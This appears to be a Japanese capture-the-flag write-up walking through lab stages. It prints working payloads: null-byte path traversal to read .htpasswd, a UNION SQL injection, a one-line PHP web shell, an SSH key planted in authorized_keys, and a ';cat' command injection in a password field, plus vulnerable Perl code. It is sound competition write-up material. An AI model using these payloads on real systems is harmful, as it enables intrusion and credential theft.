stage1

指定されたサーバーにHTTPでアクセスすると、以下のファイル一覧が表示される。

• stage1.cgi
• jpn.txt
• eng.txt
• stage2

stage2ディレクトリにはパスワードがかかっていてアクセスできない。stage1.cgiはコンボボックスで言語の切り替えができて、選んだ言語によってjpn.txtとeng.txtを読み込んでいるらしい。

http://10.0.2.3/stage1.cgi?stage2/.htpasswd%00

にアクセスすると、stage2のパスワードファイルが読める。中身は

stage2:$apr1$A6MUJxOY$yiT18nINvgC/LOADJWWKe.

John The Ripperで解析すると、

222222

だった。これでstage2にアクセスするとキーワードが表示された。

stage2

登録されているユーザーを検索するCGIらしい。ただしパスワードは伏せ字になっている。「'」を検索してみるとエラーが発生して、cgiのファイル名（index000.cgi）が分かる。stage1.cgiでこのファイルを読んでみると、SQLインジェクションがあることが分かる。

    use DBI;
    my $dbh = DBI->connect('dbi:SQLite:dbname=../../DB/stage2.db', '', '');
    my $sth = $dbh->prepare(
      "SELECT id,name,password FROM stage2 WHERE name LIKE '%".
      $q->param("keyword")."%';");
    $sth->execute();
    while(my @row = $sth->fetchrow_array) {
      my $pass = '*' x length($row[2]);
      $result .= "<tr><td>$row[0]</td><td>$row[1]</td><td>$pass</td></tr>\n";
    }
    $dbh->disconnect();

↑該当部分のソースコード。

' UNION SELECT password,name,id FROM stage2--

を検索すると、↓の表が表示される。

最初はstage3のパスワードがどういう意味なのかわからなかったけど、URLだった。

http://10.0.2.3/stage3xYz/

にアクセスするとキーワードが表示された。

stage3

画像アップローダー。画像ではなく任意のファイルをアップロードできる。phpをアップロードすれば任意のコードを実行できる。いちいちスクリプトを書いてアップロードするのは面倒なので、WhiteHackerZさんのブログで見かけた

<?php passthru($_GET["cmd"]);

をアップロードした。

ファイル一覧を取得すると、

HINT-1:_Use_SSH
HINT-2:_Append_Only

というファイルがある。SSH用の秘密鍵と公開鍵を作って、公開鍵を

/home/stage4/.ssh/authorized_keys

に追記することで、stage4でSSH接続ができる。接続するとキーワードが表示された。

フラグ書き換え

/etc/sudoersを確認すると、stage4はパスワード無しでstage5の権限でviを起動できるらしい。書き換え対象のhttp://10.0.2.3/FLAGはstage5ならば書き換え可能。

sudo -u stage5 vi

して書き換えようとしたけど、書き換え不可のエラーが出る。権限はあるのになんで……。そうしているうちに、先にフラグを書き換えたチームが他チームのSSHを切断するスクリプトを動かし始めたので、ここで断念。

キーワード1個目

サーバーにポートスキャンをかけてみると、ポート5060が開いている。

>nc 10.0.2.8 5060
Input password: nridkgns
Valid password.
Submit keyword, "Service"
Input file name: backup
bin
etc
lib
libexec
src
submit_this_key2
usr

キーワード

Service

キーワード2個目

表示される内容からして、lsを実行しているっぽい。

>nc 10.0.2.8 5060
Input password: nridkgns;cat submit_this_key2;
Valid password.
Submit keyword, "Service"
Input file name: backup
bin
etc
lib
libexec
src
submit_this_key2
usr
AfterService

キーワード

AfterService

3個目

このプログラムはchrootされているので、他のユーザーのファイルを見たりはできない。ファイルを漁ると、/backup/backup.tgzに/srcの内容が保存されていて、/usr/bin/backup.plというスクリプトがある。↓backup.plの中身。

#!/usr/bin/perl

$homedir  = "/home/user";
$bkupdir  = $homedir . "/backup";
$confdir  = $homedir . "/etc";
$bkupfile = $bkupdir . "/backup.tgz";
$conffile = $confdir . "/backup.conf";

$conffile_default = "DIR: src\n";

# 設定ファイル読み込み

for ($i = 0; $i < 2; $i++) {
    # backup.confファイルが無ければデフォルトのものを作成する．
    if (!open(FILE, "$conffile")) {
        system("rm -f $conffile");
        system("mkdir -p $confdir");
        open(FILE, "> $conffile");
        print FILE "$conffile_default";
        print "create configure file.\n";
    }
    close(FILE);

    # backup.confファイル読み込み．
    $dir = "";
    open(FILE, "$conffile");
    while (<FILE>) {
        chomp;
        ($dir) = /^DIR\:\s*(\S.*)/;
        if ($dir ne "") {
            last;
        }
    }
    close(FILE);

    if ($dir ne "") {
        if (length($dir) > 128) {
            print "too much length.\n";
        } else {
            print "found configure file.\n";
            print "dir: \"$dir\"\n";
            last;
        }
    }

    print "delete configure file.\n";
    system("rm -f $conffile");
}

# バックアップ処理

system("mkdir -p $bkupdir");
system("rm -f $bkupfile");

open(FILE, "((tar cvzf - $homedir/$dir) > $bkupfile) 2>&1 |");
while (<FILE>) {
    $c++;
    if ($c > 30) {
        last;
    }
}
close(FILE);

「$homedir = "/home/user";」からして、chroot外で動いているので、/home/user/etc/backup.confを書き換えて何かするのだろうなと思うけど上手く動かせなかった。

backup.plを他チームが見つけたら解かれそうなので、他チームへの妨害として、ダミーファイルを大量に作っておいた。

この辺で、パスワードを入力しても何も表示されなくなったりして、訳が分からなくて断念。

運営側の措置だったらしい。ごめんなさい。